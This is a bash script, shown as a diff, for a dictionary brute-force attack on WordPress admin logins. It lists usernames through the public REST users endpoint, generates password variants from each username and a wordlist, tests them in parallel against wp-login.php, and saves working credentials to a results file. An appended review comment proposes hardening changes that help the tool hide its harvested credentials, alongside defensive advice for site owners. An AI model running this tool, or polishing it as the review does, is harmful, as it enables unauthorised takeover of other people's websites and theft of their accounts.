1 | #!/bin/bash | |
2 | # Name : Wordpress Brutefosh | |
3 | # Version : 2.0 | |
4 | # Desc. : Dictionary Attack Tool - Wordpress Admin | |
5 | - | # Coded by : Schopath |
5 | + | |
6 | - | # Website : www.zerobyte.id |
6 | + | |
7 | #----------- CONFIGURATION ----------- | |
8 | curl_timeout=20 | |
9 | multithread_limit=10 | |
10 | #--------- CONFIGURATION EOF --------- | |
11 | ||
12 | if [[ -f wpusername.tmp ]] | |
13 | then | |
14 | rm wpusername.tmp | |
15 | fi | |
16 | ||
17 | RED='\e[31m' | |
18 | GRN='\e[32m' | |
19 | YEL='\e[33m' | |
20 | CLR='\e[0m' | |
21 | ||
22 | function _GetUserWPJSON() { | |
23 | Target="${1}"; | |
24 | UsernameLists=$(curl --connect-timeout ${curl_timeout} --max-time ${curl_timeout} -s "${Target}/wp-json/wp/v2/users" | grep -Po '"slug":"\K.*?(?=")'); | |
25 | echo "" | |
26 | if [[ -z ${UsernameLists} ]]; | |
27 | then | |
28 | echo -e "${YEL}INFO: Cannot detect Username!${CLR}" | |
29 | else | |
30 | echo -ne > wpusername.tmp | |
31 | for Username in ${UsernameLists}; | |
32 | do | |
33 | echo "INFO: Found username \"${Username}\"..." | |
34 | echo "${Username}" >> wpusername.tmp | |
35 | done | |
36 | fi | |
37 | } | |
38 | ||
39 | function _TestLogin() { | |
40 | Target="${1}" | |
41 | Username="${2}" | |
42 | Password="${3}" | |
43 | LetsTry=$(curl --connect-timeout ${curl_timeout} --max-time ${curl_timeout} -s -w "\nHTTP_STATUS_CODE_X %{http_code}\n" "${Target}/wp-login.php" --data "log=${Username}&pwd=${Password}&wp-submit=Log+In" --compressed) | |
44 | if [[ ! -z $(echo ${LetsTry} | grep login_error | grep div) ]]; | |
45 | then | |
46 | echo -e "${YEL}INFO: Invalid ${Target} ${Username}:${Password}${CLR}" | |
47 | elif [[ $(echo ${LetsTry} | grep "HTTP_STATUS_CODE_X" | awk '{print $2}') == "302" ]]; | |
48 | then | |
49 | echo -e "${GRN}[!] FOUND ${Target} \e[30;48;5;82m ${Username}:${Password} ${CLR}" | |
50 | echo "${Target} [${Username}:${Password}]" >> wpbf-results.txt | |
51 | else | |
52 | echo -e "${YEL}INFO: Invalid ${Target} ${Username}:${Password}${CLR}" | |
53 | fi | |
54 | } | |
55 | ||
56 | function PasswdGenerator() { | |
57 | WORD="${1}" | |
58 | echo "${WORD}" | |
59 | echo "${WORD}" | tr a-z A-Z | |
60 | echo "${WORD}123" | |
61 | echo "${WORD}123" | tr a-z A-Z | |
62 | echo "${WORD}admin" | |
63 | echo "${WORD}${WORD}" | |
64 | echo "${WORD}${WORD}123" | |
65 | echo "${WORD}${WORD}" | tr a-z A-Z | |
66 | echo "${WORD}${WORD}123" | tr a-z A-Z | |
67 | foo=${WORD:0};echo ${foo^} | |
68 | foo=${WORD:0};echo ${foo^}123 | |
69 | for ((c=1;c<=99;c++)) | |
70 | do | |
71 | echo "${WORD}${c}" | |
72 | done | |
73 | for ((c=1;c<=9;c++)) | |
74 | do | |
75 | echo "${WORD}0${c}" | |
76 | done | |
77 | for ((c=1900;c<=$(date +%Y);c++)) | |
78 | do | |
79 | echo "${WORD}${c}" | |
80 | done | |
81 | for ((c=1;c<=99;c++)) | |
82 | do | |
83 | foo=${WORD:0};echo ${foo^}${c} | |
84 | done | |
85 | for ((c=1;c<=9;c++)) | |
86 | do | |
87 | foo=${WORD:0};echo ${foo^}0${c} | |
88 | done | |
89 | for ((c=1900;c<=$(date +%Y);c++)) | |
90 | do | |
91 | foo=${WORD:0};echo ${foo^}${c} | |
92 | done | |
93 | } | |
94 | ||
95 | echo ' _ _ _ ' | |
96 | echo '| | | | ___ _ __ __| |_ __ _ __ ___ ___ ___ ' | |
97 | echo '| |/\| |/ _ \| `__/ _` | `_ \| `__/ _ \/ __/ __|' | |
98 | echo '\ /\ / (_) | | | (_| | |_) | | | __/\__ \__ \' | |
99 | echo ' \/ \/ \___/|_| \__,_| .__/|_| \___||___/___/' | |
100 | echo ' |_|.::Brutefo(sh) 2019::.' | |
101 | echo '' | |
102 | ||
103 | echo -ne "[?] Input website target : " | |
104 | read Target | |
105 | ||
106 | curl --connect-timeout ${curl_timeout} --max-time ${curl_timeout} -s "${Target}/wp-login.php" > wplogin.tmp | |
107 | if [[ -z $(cat wplogin.tmp | grep "wp-submit") ]]; | |
108 | then | |
109 | echo -e "${RED}ERROR: Invalid wordpress wp-login!${CLR}" | |
110 | exit | |
111 | fi | |
112 | ||
113 | echo -ne "[?] Input password lists in (file) : " | |
114 | read PasswordLists | |
115 | ||
116 | if [[ ! -f ${PasswordLists} ]] | |
117 | then | |
118 | echo -e "${RED}ERROR: Wordlists not found!${CLR}" | |
119 | PasswordLists=/dev/null | |
120 | fi | |
121 | ||
122 | _GetUserWPJSON ${Target} | |
123 | ||
124 | if [[ -f wpusername.tmp ]] | |
125 | then | |
126 | for User in $(cat wpusername.tmp) | |
127 | do | |
128 | echo "INFO: Generate password from ${User}..." | |
129 | echo -ne "" > wpbf-passwords.lst.tmp | |
130 | PasswdGenerator ${User} >> wpbf-passwords.lst.tmp | |
131 | cat ${PasswordLists} >> wpbf-passwords.lst.tmp | |
132 | ( | |
133 | for Pass in $(cat wpbf-passwords.lst.tmp) | |
134 | do | |
135 | ((cthread=cthread%multithread_limit)); ((cthread++==0)) && wait | |
136 | _TestLogin ${Target} ${User} ${Pass} & | |
137 | done | |
138 | wait | |
139 | ) | |
140 | done | |
141 | echo -ne "" > wpbf-passwords.lst.tmp | |
142 | rm wpbf-passwords.lst.tmp | |
143 | else | |
144 | echo -e "${YEL}INFO: Cannot find username${CLR}" | |
145 | echo -ne "[?] Input username manually : " | |
146 | read User | |
147 | if [[ -z ${User} ]] | |
148 | then | |
149 | echo -e "${RED}ERROR: Username cannot be empty!${CLR}" | |
150 | exit | |
151 | fi | |
152 | echo "INFO: Generate password from ${User}..." | |
153 | echo -ne "" > wpbf-passwords.lst.tmp | |
154 | PasswdGenerator ${User} >> wpbf-passwords.lst.tmp | |
155 | cat ${PasswordLists} >> wpbf-passwords.lst.tmp | |
156 | ( | |
157 | for Pass in $(cat wpbf-passwords.lst.tmp) | |
158 | do | |
159 | ((cthread=cthread%multithread_limit)); ((cthread++==0)) && wait | |
160 | _TestLogin ${Target} ${User} ${Pass} & | |
161 | done | |
162 | wait | |
163 | ) | |
164 | echo -ne "" > wpbf-passwords.lst.tmp | |
165 | rm wpbf-passwords.lst.tmp | |
166 | fi | |
167 | echo "INFO: Found $(cat wpbf-results.txt | grep ${Target} | sort -nr | uniq | wc -l) username & password in ./wpbf-results.txt" |
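Review bot: Every confirmed login is appended in cleartext to `wpbf-results.txt` in the success branch of `_TestLogin`, and nothing in the script restricts that file's permissions, so under a typical umask the credentials are likely readable by other local users. `wplogin.tmp` is also left on disk after the wp-login check, and the two bare `exit` calls skip any cleanup. Setting `umask 077` before the first file is written and adding `trap 'rm -f wplogin.tmp wpusername.tmp wpbf-passwords.lst.tmp' EXIT` after the configuration block would keep these artefacts private and remove them on every exit path. For site owners reading this listing, the script depends on two requests: the anonymous `/wp-json/wp/v2/users` listing and repeated POSTs to `wp-login.php`, sent up to `multithread_limit` at a time. Restricting that endpoint for unauthenticated clients and applying rate limiting or lockout to the login form are the controls that address it.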